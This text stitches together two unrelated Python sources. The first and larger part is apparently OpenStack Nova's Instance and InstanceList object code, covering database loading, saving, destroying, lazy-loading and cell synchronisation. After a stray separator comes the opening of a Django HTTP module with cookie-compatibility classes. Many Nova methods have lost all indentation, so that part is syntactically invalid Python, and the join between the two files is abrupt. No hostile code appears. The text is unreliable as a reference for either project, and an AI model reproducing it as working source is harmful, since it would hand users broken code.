        if 'pci_requests' in expected_attrs:
            if have_extra:
                instance._load_pci_requests(
                    db_inst['extra'].get('pci_requests'))
            else:
                instance.pci_requests = None
        if 'vcpu_model' in expected_attrs:
            if have_extra:
                instance._load_vcpu_model(
                    db_inst['extra'].get('vcpu_model'))
            else:
                instance.vcpu_model = None
        if 'ec2_ids' in expected_attrs:
            instance._load_ec2_ids()
        if 'migration_context' in expected_attrs:
            if have_extra:
                instance._load_migration_context(
                    db_inst['extra'].get('migration_context'))
            else:
                instance.migration_context = None
        if 'info_cache' in expected_attrs:
            if db_inst.get('info_cache') is None:
                instance.info_cache = None
            elif not instance.obj_attr_is_set('info_cache'):
                # TODO(danms): If this ever happens on a backlevel instance
                # passed to us by a backlevel service, things will break
                instance.info_cache = objects.InstanceInfoCache(context)
            if instance.info_cache is not None:
                instance.info_cache._from_db_object(context,
                                                    instance.info_cache,
                                                    db_inst['info_cache'])

        if any([x in expected_attrs for x in ('flavor',
                                              'old_flavor',
                                              'new_flavor')]):
            if have_extra and db_inst['extra'].get('flavor'):
                instance._flavor_from_db(db_inst['extra']['flavor'])

        # TODO(danms): If we are updating these on a backlevel instance,
        # we'll end up sending back new versions of these objects (see
        # above note for new info_caches
        if 'pci_devices' in expected_attrs:
            pci_devices = base.obj_make_list(
                    context, objects.PciDeviceList(context),
                    objects.PciDevice, db_inst['pci_devices'])
            instance['pci_devices'] = pci_devices
        if 'security_groups' in expected_attrs:
            sec_groups = base.obj_make_list(
                    context, objects.SecurityGroupList(context),
                    objects.SecurityGroup, db_inst.get('security_groups', []))
            instance['security_groups'] = sec_groups
        if 'tags' in expected_attrs:
            tags = base.obj_make_list(
                context, objects.TagList(context),
                objects.Tag, db_inst['tags'])
            instance['tags'] = tags

        # Everything above came straight from the DB; start clean.
        instance.obj_reset_changes()
        return instance
    @base.remotable_classmethod
    def get_by_uuid(cls, context, uuid, expected_attrs=None, use_slave=False):
        """Fetch an instance by UUID, joining the requested attributes."""
        if expected_attrs is None:
            # Defaults mirror INSTANCE_DEFAULT_FIELDS' joined subset.
            expected_attrs = ['info_cache', 'security_groups']
        columns_to_join = _expected_cols(expected_attrs)
        db_inst = db.instance_get_by_uuid(context, uuid,
                                          columns_to_join=columns_to_join,
                                          use_slave=use_slave)
        return cls._from_db_object(context, cls(), db_inst,
                                   expected_attrs)
@base.remotable_classmethod
def get_by_id(cls, context, inst_id, expected_attrs=None):
if expected_attrs is None:
expected_attrs = ['info_cache', 'security_groups']
columns_to_join = _expected_cols(expected_attrs)
db_inst = db.instance_get(context, inst_id,
columns_to_join=columns_to_join)
return cls._from_db_object(context, cls(), db_inst,
expected_attrs)
    @base.remotable
    def create(self):
        """Persist a new instance row, packing extra fields as JSON.

        Raises ObjectActionError if the object was already created.
        """
        if self.obj_attr_is_set('id'):
            raise exception.ObjectActionError(action='create',
                                              reason='already created')
        updates = self.obj_get_changes()
        expected_attrs = [attr for attr in INSTANCE_DEFAULT_FIELDS
                          if attr in updates]
        if 'security_groups' in updates:
            # The DB layer takes security group names, not objects.
            updates['security_groups'] = [x.name for x in
                                          updates['security_groups']]
        if 'info_cache' in updates:
            # Serialize the network info for storage.
            updates['info_cache'] = {
                'network_info': updates['info_cache'].network_info.json()
                }
        updates['extra'] = {}
        # The following fields live in the instance_extra table as JSON;
        # pop each from updates and stash its serialized form in 'extra'.
        numa_topology = updates.pop('numa_topology', None)
        if numa_topology:
            expected_attrs.append('numa_topology')
            updates['extra']['numa_topology'] = numa_topology._to_json()
        pci_requests = updates.pop('pci_requests', None)
        if pci_requests:
            expected_attrs.append('pci_requests')
            updates['extra']['pci_requests'] = (
                pci_requests.to_json())
        flavor = updates.pop('flavor', None)
        if flavor:
            expected_attrs.append('flavor')
            # old/new flavors are optional; serialize only when set.
            old = ((self.obj_attr_is_set('old_flavor') and
                    self.old_flavor) and
                   self.old_flavor.obj_to_primitive() or None)
            new = ((self.obj_attr_is_set('new_flavor') and
                    self.new_flavor) and
                   self.new_flavor.obj_to_primitive() or None)
            flavor_info = {
                'cur': self.flavor.obj_to_primitive(),
                'old': old,
                'new': new,
            }
            updates['extra']['flavor'] = jsonutils.dumps(flavor_info)
        vcpu_model = updates.pop('vcpu_model', None)
        if vcpu_model:
            expected_attrs.append('vcpu_model')
            updates['extra']['vcpu_model'] = (
                jsonutils.dumps(vcpu_model.obj_to_primitive()))
        db_inst = db.instance_create(self._context, updates)
        # Refresh this object from the row we just created.
        self._from_db_object(self._context, self, db_inst, expected_attrs)
    @base.remotable
    def destroy(self):
        """Delete the instance row, guarding against concurrent migration.

        Raises ObjectActionError when the object has no id/uuid or when
        the host changed between read and delete.
        """
        if not self.obj_attr_is_set('id'):
            raise exception.ObjectActionError(action='destroy',
                                              reason='already destroyed')
        if not self.obj_attr_is_set('uuid'):
            raise exception.ObjectActionError(action='destroy',
                                              reason='no uuid')
        if not self.obj_attr_is_set('host') or not self.host:
            # NOTE(danms): If our host is not set, avoid a race
            constraint = db.constraint(host=db.equal_any(None))
        else:
            constraint = None

        cell_type = cells_opts.get_cell_type()
        if cell_type is not None:
            # NOTE(review): keep a pre-destroy copy so cells can be told
            # about the instance as it looked before deletion.
            stale_instance = self.obj_clone()

        try:
            db_inst = db.instance_destroy(self._context, self.uuid,
                                          constraint=constraint)
            self._from_db_object(self._context, self, db_inst)
        except exception.ConstraintNotMet:
            # Host changed under us; let the caller retry/handle.
            raise exception.ObjectActionError(action='destroy',
                                              reason='host changed')
        if cell_type == 'compute':
            cells_api = cells_rpcapi.CellsAPI()
            cells_api.instance_destroy_at_top(self._context, stale_instance)
        # Drop 'id' so a subsequent destroy() reports 'already destroyed'.
        delattr(self, base.get_attrname('id'))
    def _save_info_cache(self, context):
        # Save the nested info_cache object (if any) under this context.
        if self.info_cache:
            with self.info_cache.obj_alternate_context(context):
                self.info_cache.save()
def _save_security_groups(self, context):
security_groups = self.security_groups or []
for secgroup in security_groups:
with secgroup.obj_alternate_context(context):
secgroup.save()
self.security_groups.obj_reset_changes()
    def _save_fault(self, context):
        """No-op save handler for the 'fault' object field."""
        # NOTE(danms): I don't think we need to worry about this, do we?
        pass
def _save_numa_topology(self, context):
if self.numa_topology:
self.numa_topology.instance_uuid = self.uuid
with self.numa_topology.obj_alternate_context(context):
self.numa_topology._save()
else:
objects.InstanceNUMATopology.delete_by_instance_uuid(
context, self.uuid)
    def _save_pci_requests(self, context):
        """No-op save handler for the 'pci_requests' object field."""
        # NOTE(danms): No need for this yet.
        pass
    def _save_pci_devices(self, context):
        """No-op save handler for the 'pci_devices' object field."""
        # NOTE(yjiang5): All devices held by PCI tracker, only PCI tracker
        # permitted to update the DB. all change to devices from here will
        # be dropped.
        pass
def _save_flavor(self, context):
if not any([x in self.obj_what_changed() for x in
('flavor', 'old_flavor', 'new_flavor')]):
return
# FIXME(danms): We can do this smarterly by updating this
# with all the other extra things at the same time
flavor_info = {
'cur': self.flavor.obj_to_primitive(),
'old': (self.old_flavor and
self.old_flavor.obj_to_primitive() or None),
'new': (self.new_flavor and
self.new_flavor.obj_to_primitive() or None),
}
db.instance_extra_update_by_uuid(
context, self.uuid,
{'flavor': jsonutils.dumps(flavor_info)})
self.obj_reset_changes(['flavor', 'old_flavor', 'new_flavor'])
def _save_old_flavor(self, context):
if 'old_flavor' in self.obj_what_changed():
self._save_flavor(context)
def _save_new_flavor(self, context):
if 'new_flavor' in self.obj_what_changed():
self._save_flavor(context)
def _save_vcpu_model(self, context):
# TODO(yjiang5): should merge the db accesses for all the extra
# fields
if 'vcpu_model' in self.obj_what_changed():
if self.vcpu_model:
update = jsonutils.dumps(self.vcpu_model.obj_to_primitive())
else:
update = None
db.instance_extra_update_by_uuid(
context, self.uuid,
{'vcpu_model': update})
    def _save_ec2_ids(self, context):
        """No-op save handler for the 'ec2_ids' object field."""
        # NOTE(hanlind): Read-only so no need to save this.
        pass
def _save_migration_context(self, context):
if self.migration_context:
self.migration_context.instance_uuid = self.uuid
with self.migration_context.obj_alternate_context(context):
self.migration_context._save()
else:
objects.MigrationContext._destroy(context, self.uuid)
    @base.remotable
    def save(self, expected_vm_state=None,
             expected_task_state=None, admin_state_reset=False):
        """Save updates to this instance.

        Column-wise updates will be made based on the result of
        self.what_changed(). If expected_task_state is provided,
        it will be checked against the in-database copy of the
        instance before updates are made.

        :param expected_vm_state: Optional tuple of valid vm states
                                  for the instance to be in
        :param expected_task_state: Optional tuple of valid task states
                                    for the instance to be in
        :param admin_state_reset: True if admin API is forcing setting
                                  of task_state/vm_state
        """
        # Store this on the class because _cell_name_blocks_sync is useless
        # after the db update call below.
        self._sync_cells = not self._cell_name_blocks_sync()
        context = self._context
        cell_type = cells_opts.get_cell_type()
        if cell_type is not None:
            # NOTE(comstud): We need to stash a copy of ourselves
            # before any updates are applied. When we call the save
            # methods on nested objects, we will lose any changes to
            # them. But we need to make sure child cells can tell
            # what is changed.
            #
            # We also need to nuke any updates to vm_state and task_state
            # unless admin_state_reset is True. compute cells are
            # authoritative for their view of vm_state and task_state.
            stale_instance = self.obj_clone()
        cells_update_from_api = (cell_type == 'api' and self.cell_name and
                                 self._sync_cells)
        if cells_update_from_api:
            # Defined as a closure so it captures the stale (pre-save) copy;
            # it is invoked both on the no-update early return and after a
            # successful DB update below.
            def _handle_cell_update_from_api():
                cells_api = cells_rpcapi.CellsAPI()
                cells_api.instance_update_from_api(context, stale_instance,
                                                   expected_vm_state,
                                                   expected_task_state,
                                                   admin_state_reset)
        # Collect column updates for plain fields; object fields are saved
        # through their per-field handlers instead.
        updates = {}
        changes = self.obj_what_changed()
        for field in self.fields:
            # NOTE(danms): For object fields, we construct and call a
            # helper method like self._save_$attrname()
            if (self.obj_attr_is_set(field) and
                    isinstance(self.fields[field], fields.ObjectField)):
                try:
                    getattr(self, '_save_%s' % field)(context)
                except AttributeError:
                    LOG.exception(_LE('No save handler for %s'), field,
                                  instance=self)
                except db_exc.DBReferenceError as exp:
                    if exp.key != 'instance_uuid':
                        raise
                    # NOTE(melwitt): This will happen if we instance.save()
                    # before an instance.create() and FK constraint fails.
                    # In practice, this occurs in cells during a delete of
                    # an unscheduled instance. Otherwise, it could happen
                    # as a result of bug.
                    raise exception.InstanceNotFound(instance_id=self.uuid)
            elif field in changes:
                if (field == 'cell_name' and self[field] is not None and
                        self[field].startswith(cells_utils.BLOCK_SYNC_FLAG)):
                    # Strip the sync-blocking marker before it hits the DB.
                    updates[field] = self[field].replace(
                        cells_utils.BLOCK_SYNC_FLAG, '', 1)
                else:
                    updates[field] = self[field]
        if not updates:
            if cells_update_from_api:
                _handle_cell_update_from_api()
            return
        # Cleaned needs to be turned back into an int here
        if 'cleaned' in updates:
            if updates['cleaned']:
                updates['cleaned'] = 1
            else:
                updates['cleaned'] = 0
        if expected_task_state is not None:
            updates['expected_task_state'] = expected_task_state
        if expected_vm_state is not None:
            updates['expected_vm_state'] = expected_vm_state
        expected_attrs = [attr for attr in _INSTANCE_OPTIONAL_JOINED_FIELDS
                          if self.obj_attr_is_set(attr)]
        if 'pci_devices' in expected_attrs:
            # NOTE(danms): We don't refresh pci_devices on save right now
            expected_attrs.remove('pci_devices')
        # NOTE(alaski): We need to pull system_metadata for the
        # notification.send_update() below. If we don't there's a KeyError
        # when it tries to extract the flavor.
        # NOTE(danms): If we have sysmeta, we need flavor since the caller
        # might be expecting flavor information as a result
        if 'system_metadata' not in expected_attrs:
            expected_attrs.append('system_metadata')
            expected_attrs.append('flavor')
        old_ref, inst_ref = db.instance_update_and_get_original(
            context, self.uuid, updates,
            columns_to_join=_expected_cols(expected_attrs))
        self._from_db_object(context, self, inst_ref,
                             expected_attrs=expected_attrs)
        if cells_update_from_api:
            _handle_cell_update_from_api()
        elif cell_type == 'compute':
            if self._sync_cells:
                cells_api = cells_rpcapi.CellsAPI()
                cells_api.instance_update_at_top(context, stale_instance)
        def _notify():
            # NOTE(danms): We have to be super careful here not to trigger
            # any lazy-loads that will unmigrate or unbackport something. So,
            # make a copy of the instance for notifications first.
            new_ref = self.obj_clone()
            notifications.send_update(context, old_ref, new_ref)
        # NOTE(alaski): If cell synchronization is blocked it means we have
        # already run this block of code in either the parent or child of this
        # cell. Therefore this notification has already been sent.
        if not self._sync_cells:
            _notify = lambda: None  # noqa: F811
        _notify()
        self.obj_reset_changes()
@base.remotable
def refresh(self, use_slave=False):
extra = [field for field in INSTANCE_OPTIONAL_ATTRS
if self.obj_attr_is_set(field)]
current = self.__class__.get_by_uuid(self._context, uuid=self.uuid,
expected_attrs=extra,
use_slave=use_slave)
# NOTE(danms): We orphan the instance copy so we do not unexpectedly
# trigger a lazy-load (which would mean we failed to calculate the
# expected_attrs properly)
current._context = None
for field in self.fields:
if self.obj_attr_is_set(field):
if field == 'info_cache':
self.info_cache.refresh()
elif self[field] != current[field]:
self[field] = current[field]
self.obj_reset_changes()
def _load_generic(self, attrname):
instance = self.__class__.get_by_uuid(self._context,
uuid=self.uuid,
expected_attrs=[attrname])
# NOTE(danms): Never allow us to recursively-load
if instance.obj_attr_is_set(attrname):
self[attrname] = instance[attrname]
else:
raise exception.ObjectActionError(
action='obj_load_attr',
reason='loading %s requires recursion' % attrname)
def _load_fault(self):
self.fault = objects.InstanceFault.get_latest_for_instance(
self._context, self.uuid)
def _load_numa_topology(self, db_topology=None):
if db_topology is not None:
self.numa_topology = \
objects.InstanceNUMATopology.obj_from_db_obj(self.uuid,
db_topology)
else:
try:
self.numa_topology = \
objects.InstanceNUMATopology.get_by_instance_uuid(
self._context, self.uuid)
except exception.NumaTopologyNotFound:
self.numa_topology = None
def _load_pci_requests(self, db_requests=None):
# FIXME: also do this if none!
if db_requests is not None:
self.pci_requests = objects.InstancePCIRequests.obj_from_db(
self._context, self.uuid, db_requests)
else:
self.pci_requests = \
objects.InstancePCIRequests.get_by_instance_uuid(
self._context, self.uuid)
def _load_flavor(self):
instance = self.__class__.get_by_uuid(
self._context, uuid=self.uuid,
expected_attrs=['flavor', 'system_metadata'])
# NOTE(danms): Orphan the instance to make sure we don't lazy-load
# anything below
instance._context = None
self.flavor = instance.flavor
self.old_flavor = instance.old_flavor
self.new_flavor = instance.new_flavor
# NOTE(danms): The query above may have migrated the flavor from
# system_metadata. Since we have it anyway, go ahead and refresh
# our system_metadata from it so that a save will be accurate.
instance.system_metadata.update(self.get('system_metadata', {}))
self.system_metadata = instance.system_metadata
def _load_vcpu_model(self, db_vcpu_model=None):
if db_vcpu_model is None:
self.vcpu_model = objects.VirtCPUModel.get_by_instance_uuid(
self._context, self.uuid)
else:
db_vcpu_model = jsonutils.loads(db_vcpu_model)
self.vcpu_model = objects.VirtCPUModel.obj_from_primitive(
db_vcpu_model)
    def _load_ec2_ids(self):
        """Populate self.ec2_ids with the EC2 id mappings for this instance."""
        self.ec2_ids = objects.EC2Ids.get_by_instance(self._context, self)
def _load_migration_context(self, db_context=_NO_DATA_SENTINEL):
if db_context is _NO_DATA_SENTINEL:
try:
self.migration_context = (
objects.MigrationContext.get_by_instance_uuid(
self._context, self.uuid))
except exception.MigrationContextNotFound:
self.migration_context = None
elif db_context is None:
self.migration_context = None
else:
self.migration_context = objects.MigrationContext.obj_from_db_obj(
db_context)
def apply_migration_context(self):
if self.migration_context:
self.numa_topology = self.migration_context.new_numa_topology
else:
LOG.debug("Trying to apply a migration context that does not "
"seem to be set for this instance", instance=self)
def revert_migration_context(self):
if self.migration_context:
self.numa_topology = self.migration_context.old_numa_topology
else:
LOG.debug("Trying to revert a migration context that does not "
"seem to be set for this instance", instance=self)
@contextlib.contextmanager
def mutated_migration_context(self):
"""Context manager to temporarily apply the migration context.
Calling .save() from within the context manager means that the mutated
context will be saved which can cause incorrect resource tracking, and
should be avoided.
"""
current_numa_topo = self.numa_topology
self.apply_migration_context()
try:
yield
finally:
self.numa_topology = current_numa_topo
@base.remotable
def drop_migration_context(self):
if self.migration_context:
objects.MigrationContext._destroy(self._context, self.uuid)
self.migration_context = None
def obj_load_attr(self, attrname):
if attrname not in INSTANCE_OPTIONAL_ATTRS:
raise exception.ObjectActionError(
action='obj_load_attr',
reason='attribute %s not lazy-loadable' % attrname)
if not self._context:
raise exception.OrphanedObjectError(method='obj_load_attr',
objtype=self.obj_name())
LOG.debug("Lazy-loading `%(attr)s' on %(name)s uuid %(uuid)s",
{'attr': attrname,
'name': self.obj_name(),
'uuid': self.uuid,
})
# NOTE(danms): We handle some fields differently here so that we
# can be more efficient
if attrname == 'fault':
self._load_fault()
elif attrname == 'numa_topology':
self._load_numa_topology()
elif attrname == 'pci_requests':
self._load_pci_requests()
elif attrname == 'vcpu_model':
self._load_vcpu_model()
elif attrname == 'ec2_ids':
self._load_ec2_ids()
elif attrname == 'migration_context':
self._load_migration_context()
elif 'flavor' in attrname:
self._load_flavor()
else:
# FIXME(comstud): This should be optimized to only load the attr.
self._load_generic(attrname)
self.obj_reset_changes([attrname])
def get_flavor(self, namespace=None):
prefix = ('%s_' % namespace) if namespace is not None else ''
attr = '%sflavor' % prefix
try:
return getattr(self, attr)
except exception.FlavorNotFound:
# NOTE(danms): This only happens in the case where we don't
# have flavor information in sysmeta or extra, and doing
# this triggers a lookup based on our instance_type_id for
# (very) legacy instances. That legacy code expects a None here,
# so emulate it for this helper, even though the actual attribute
# is not nullable.
return None
def set_flavor(self, flavor, namespace=None):
prefix = ('%s_' % namespace) if namespace is not None else ''
attr = '%sflavor' % prefix
if not isinstance(flavor, objects.Flavor):
flavor = objects.Flavor(**flavor)
setattr(self, attr, flavor)
self.save()
def delete_flavor(self, namespace):
prefix = ('%s_' % namespace) if namespace else ''
attr = '%sflavor' % prefix
setattr(self, attr, None)
self.save()
@base.remotable
def delete_metadata_key(self, key):
"""Optimized metadata delete method.
This provides a more efficient way to delete a single metadata
key, instead of just calling instance.save(). This should be called
with the key still present in self.metadata, which it will update
after completion.
"""
db.instance_metadata_delete(self._context, self.uuid, key)
md_was_changed = 'metadata' in self.obj_what_changed()
del self.metadata[key]
self._orig_metadata.pop(key, None)
notifications.send_update(self._context, self, self)
if not md_was_changed:
self.obj_reset_changes(['metadata'])
def _cell_name_blocks_sync(self):
if (self.obj_attr_is_set('cell_name') and
self.cell_name is not None and
self.cell_name.startswith(cells_utils.BLOCK_SYNC_FLAG)):
return True
return False
def _normalize_cell_name(self):
"""Undo skip_cell_sync()'s cell_name modification if applied"""
if not self.obj_attr_is_set('cell_name') or self.cell_name is None:
return
cn_changed = 'cell_name' in self.obj_what_changed()
if self.cell_name.startswith(cells_utils.BLOCK_SYNC_FLAG):
self.cell_name = self.cell_name.replace(
cells_utils.BLOCK_SYNC_FLAG, '', 1)
# cell_name is not normally an empty string, this means it was None
# or unset before cells_utils.BLOCK_SYNC_FLAG was applied.
if len(self.cell_name) == 0:
self.cell_name = None
if not cn_changed:
self.obj_reset_changes(['cell_name'])
@contextlib.contextmanager
def skip_cells_sync(self):
"""Context manager to save an instance without syncing cells.
Temporarily disables the cells syncing logic, if enabled. This should
only be used when saving an instance that has been passed down/up from
another cell in order to avoid passing it back to the originator to be
re-saved.
"""
cn_changed = 'cell_name' in self.obj_what_changed()
if not self.obj_attr_is_set('cell_name') or self.cell_name is None:
self.cell_name = ''
self.cell_name = '%s%s' % (cells_utils.BLOCK_SYNC_FLAG, self.cell_name)
if not cn_changed:
self.obj_reset_changes(['cell_name'])
try:
yield
finally:
self._normalize_cell_name()
def _make_instance_list(context, inst_list, db_inst_list, expected_attrs):
    """Populate inst_list with Instance objects built from db_inst_list.

    :param context: request context used to build the objects
    :param inst_list: an InstanceList (or compatible) to fill in place
    :param db_inst_list: raw DB instance rows
    :param expected_attrs: optional list of attrs to hydrate; a 'fault'
        entry triggers a batched fault lookup instead of a DB join
    :returns: inst_list, with .objects populated and changes reset
    """
    get_fault = expected_attrs and 'fault' in expected_attrs
    inst_faults = {}
    if get_fault:
        # Build an instance_uuid:latest-fault mapping. Work on a filtered
        # copy: the previous code called expected_attrs.remove('fault'),
        # mutating the caller's list as a side effect.
        expected_attrs = [attr for attr in expected_attrs
                          if attr != 'fault']
        instance_uuids = [inst['uuid'] for inst in db_inst_list]
        faults = objects.InstanceFaultList.get_by_instance_uuids(
            context, instance_uuids)
        for fault in faults:
            # Faults are returned newest-first; keep only the latest per uuid.
            if fault.instance_uuid not in inst_faults:
                inst_faults[fault.instance_uuid] = fault
    inst_cls = objects.Instance
    inst_list.objects = []
    for db_inst in db_inst_list:
        inst_obj = inst_cls._from_db_object(
            context, inst_cls(context), db_inst,
            expected_attrs=expected_attrs)
        if get_fault:
            inst_obj.fault = inst_faults.get(inst_obj.uuid, None)
        inst_list.objects.append(inst_obj)
    inst_list.obj_reset_changes()
    return inst_list
@base.NovaObjectRegistry.register
class InstanceList(base.ObjectListBase, base.NovaObject):
    """A list of Instance objects with remotable batch-query constructors.

    Each classmethod is a thin wrapper over the corresponding DB API call,
    funneled through _make_instance_list() to build the objects.
    """
    # Version 2.0: Initial Version
    VERSION = '2.0'
    fields = {
        'objects': fields.ListOfObjectsField('Instance'),
    }
    @base.remotable_classmethod
    def get_by_filters(cls, context, filters,
                       sort_key='created_at', sort_dir='desc', limit=None,
                       marker=None, expected_attrs=None, use_slave=False,
                       sort_keys=None, sort_dirs=None):
        # Multi-key sort parameters take precedence over the single-key form.
        if sort_keys or sort_dirs:
            db_inst_list = db.instance_get_all_by_filters_sort(
                context, filters, limit=limit, marker=marker,
                columns_to_join=_expected_cols(expected_attrs),
                use_slave=use_slave, sort_keys=sort_keys, sort_dirs=sort_dirs)
        else:
            db_inst_list = db.instance_get_all_by_filters(
                context, filters, sort_key, sort_dir, limit=limit,
                marker=marker, columns_to_join=_expected_cols(expected_attrs),
                use_slave=use_slave)
        return _make_instance_list(context, cls(), db_inst_list,
                                   expected_attrs)
    @base.remotable_classmethod
    def get_by_host(cls, context, host, expected_attrs=None, use_slave=False):
        db_inst_list = db.instance_get_all_by_host(
            context, host, columns_to_join=_expected_cols(expected_attrs),
            use_slave=use_slave)
        return _make_instance_list(context, cls(), db_inst_list,
                                   expected_attrs)
    @base.remotable_classmethod
    def get_by_host_and_node(cls, context, host, node, expected_attrs=None):
        db_inst_list = db.instance_get_all_by_host_and_node(
            context, host, node,
            columns_to_join=_expected_cols(expected_attrs))
        return _make_instance_list(context, cls(), db_inst_list,
                                   expected_attrs)
    @base.remotable_classmethod
    def get_by_host_and_not_type(cls, context, host, type_id=None,
                                 expected_attrs=None):
        # NOTE(review): unlike the other queries, this DB call receives no
        # columns_to_join, so expected_attrs only affects object hydration.
        db_inst_list = db.instance_get_all_by_host_and_not_type(
            context, host, type_id=type_id)
        return _make_instance_list(context, cls(), db_inst_list,
                                   expected_attrs)
    @base.remotable_classmethod
    def get_all(cls, context, expected_attrs=None):
        """Returns all instances on all nodes."""
        db_instances = db.instance_get_all(
            context, columns_to_join=_expected_cols(expected_attrs))
        return _make_instance_list(context, cls(), db_instances,
                                   expected_attrs)
    @base.remotable_classmethod
    def get_hung_in_rebooting(cls, context, reboot_window,
                              expected_attrs=None):
        db_inst_list = db.instance_get_all_hung_in_rebooting(context,
                                                             reboot_window)
        return _make_instance_list(context, cls(), db_inst_list,
                                   expected_attrs)
    @base.remotable_classmethod
    def _get_active_by_window_joined(cls, context, begin, end=None,
                                     project_id=None, host=None,
                                     expected_attrs=None,
                                     use_slave=False):
        # NOTE(mriedem): We need to convert the begin/end timestamp strings
        # to timezone-aware datetime objects for the DB API call.
        begin = timeutils.parse_isotime(begin)
        end = timeutils.parse_isotime(end) if end else None
        db_inst_list = db.instance_get_active_by_window_joined(
            context, begin, end, project_id, host,
            columns_to_join=_expected_cols(expected_attrs))
        return _make_instance_list(context, cls(), db_inst_list,
                                   expected_attrs)
    @classmethod
    def get_active_by_window_joined(cls, context, begin, end=None,
                                    project_id=None, host=None,
                                    expected_attrs=None,
                                    use_slave=False):
        """Get instances and joins active during a certain time window.

        :param:context: nova request context
        :param:begin: datetime for the start of the time window
        :param:end: datetime for the end of the time window
        :param:project_id: used to filter instances by project
        :param:host: used to filter instances on a given compute host
        :param:expected_attrs: list of related fields that can be joined
        in the database layer when querying for instances
        :param use_slave if True, ship this query off to a DB slave
        :returns: InstanceList
        """
        # NOTE(mriedem): We have to convert the datetime objects to string
        # primitives for the remote call.
        begin = utils.isotime(begin)
        end = utils.isotime(end) if end else None
        return cls._get_active_by_window_joined(context, begin, end,
                                                project_id, host,
                                                expected_attrs,
                                                use_slave=use_slave)
    @base.remotable_classmethod
    def get_by_security_group_id(cls, context, security_group_id):
        db_secgroup = db.security_group_get(
            context, security_group_id,
            columns_to_join=['instances.info_cache',
                             'instances.system_metadata'])
        return _make_instance_list(context, cls(), db_secgroup['instances'],
                                   ['info_cache', 'system_metadata'])
    @classmethod
    def get_by_security_group(cls, context, security_group):
        # Convenience wrapper that accepts a security group object.
        return cls.get_by_security_group_id(context, security_group.id)
    @base.remotable_classmethod
    def get_by_grantee_security_group_ids(cls, context, security_group_ids):
        db_instances = db.instance_get_all_by_grantee_security_groups(
            context, security_group_ids)
        return _make_instance_list(context, cls(), db_instances, [])
    def fill_faults(self):
        """Batch query the database for our instances' faults.

        :returns: A list of instance uuids for which faults were found.
        """
        uuids = [inst.uuid for inst in self]
        faults = objects.InstanceFaultList.get_by_instance_uuids(
            self._context, uuids)
        faults_by_uuid = {}
        for fault in faults:
            # Keep only the first (latest) fault seen per instance uuid.
            if fault.instance_uuid not in faults_by_uuid:
                faults_by_uuid[fault.instance_uuid] = fault
        for instance in self:
            if instance.uuid in faults_by_uuid:
                instance.fault = faults_by_uuid[instance.uuid]
            else:
                # NOTE(danms): Otherwise the caller will cause a lazy-load
                # when checking it, and we know there are none
                instance.fault = None
            instance.obj_reset_changes(['fault'])
        return faults_by_uuid.keys()
| |
from __future__ import absolute_import
import datetime
import os
import re
import sys
import time
import warnings
from pprint import pformat
from urllib import urlencode, quote
from urlparse import urljoin
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
try:
# The mod_python version is more efficient, so try importing it first.
from mod_python.util import parse_qsl
except ImportError:
try:
# Python 2.6 and greater
from urlparse import parse_qsl
except ImportError:
# Python 2.5. Works on Python 2.6 but raises PendingDeprecationWarning
from cgi import parse_qsl
import Cookie
# httponly support exists in Python 2.6's Cookie library,
# but not in Python 2.5.
# Feature-detect quirks of the stdlib Cookie module at import time; the
# results select which Morsel/SimpleCookie classes get defined below.
_morsel_supports_httponly = 'httponly' in Cookie.Morsel._reserved
# Some versions of Python 2.7 and later won't need this encoding bug fix:
_cookie_encodes_correctly = Cookie.SimpleCookie().value_encode(';') == (';', '"\\073"')
# See ticket #13007, http://bugs.python.org/issue2193 and http://trac.edgewall.org/ticket/2256
_tc = Cookie.SimpleCookie()
try:
    # Probe whether this stdlib version tolerates ':' in cookie names.
    _tc.load('foo:bar=1')
    _cookie_allows_colon_in_names = True
except Cookie.CookieError:
    _cookie_allows_colon_in_names = False
# If the stdlib Cookie module has none of the known quirks, use it as-is;
# otherwise define patched Morsel/SimpleCookie subclasses working around
# exactly the quirks detected above.
if _morsel_supports_httponly and _cookie_encodes_correctly and _cookie_allows_colon_in_names:
    SimpleCookie = Cookie.SimpleCookie
else:
    if not _morsel_supports_httponly:
        class Morsel(Cookie.Morsel):
            # Morsel subclass that accepts the 'httponly' attribute on
            # stdlib versions that reject it.
            def __setitem__(self, K, V):
                K = K.lower()
                if K == "httponly":
                    if V:
                        # The superclass rejects httponly as a key,
                        # so we jump to the grandparent.
                        super(Cookie.Morsel, self).__setitem__(K, V)
                else:
                    super(Morsel, self).__setitem__(K, V)
            def OutputString(self, attrs=None):
                # Append "; httponly" manually since the superclass does
                # not know about the attribute.
                output = super(Morsel, self).OutputString(attrs)
                if "httponly" in self:
                    output += "; httponly"
                return output
    else:
        Morsel = Cookie.Morsel
    class SimpleCookie(Cookie.SimpleCookie):
        # Patched SimpleCookie; each override is defined conditionally so
        # only the needed workarounds are active.
        if not _cookie_encodes_correctly:
            def value_encode(self, val):
                # Some browsers do not support quoted-string from RFC 2109,
                # including some versions of Safari and Internet Explorer.
                # These browsers split on ';', and some versions of Safari
                # are known to split on ', '. Therefore, we encode ';' and ','
                # SimpleCookie already does the hard work of encoding and decoding.
                # It uses octal sequences like '\\012' for newline etc.
                # and non-ASCII chars. We just make use of this mechanism, to
                # avoid introducing two encoding schemes which would be confusing
                # and especially awkward for javascript.
                # NB, contrary to Python docs, value_encode returns a tuple containing
                # (real val, encoded_val)
                val, encoded = super(SimpleCookie, self).value_encode(val)
                encoded = encoded.replace(";", "\\073").replace(",","\\054")
                # If encoded now contains any quoted chars, we need double quotes
                # around the whole string.
                if "\\" in encoded and not encoded.startswith('"'):
                    encoded = '"' + encoded + '"'
                return val, encoded
        if not _cookie_allows_colon_in_names or not _morsel_supports_httponly:
            def load(self, rawdata):
                # Collect keys that failed to parse, then drop them rather
                # than letting one bad cookie abort the whole load.
                self.bad_cookies = set()
                super(SimpleCookie, self).load(rawdata)
                for key in self.bad_cookies:
                    del self[key]
            # override private __set() method:
            # (needed for using our Morsel, and for laxness with CookieError
            def _BaseCookie__set(self, key, real_value, coded_value):
                try:
                    M = self.get(key, Morsel())
                    M.set(key, real_value, coded_value)
                    dict.__setitem__(self, key, M)
                except Cookie.CookieError:
                    self.bad_cookies.add(key)
                    dict.__setitem__(self, key, Cookie.Morsel())
class CompatCookie(SimpleCookie):
    """Deprecated alias of SimpleCookie; warns on instantiation."""
    def __init__(self, *args, **kwargs):
        super(CompatCookie, self).__init__(*args, **kwargs)
        # 'warnings' is already imported at module level; the previous
        # function-local re-import was redundant.
        warnings.warn("CompatCookie is deprecated. Use django.http.SimpleCookie instead.", DeprecationWarning)
from django.conf import settings
from django.core import signing
from django.core.exceptions import ImproperlyConfigured
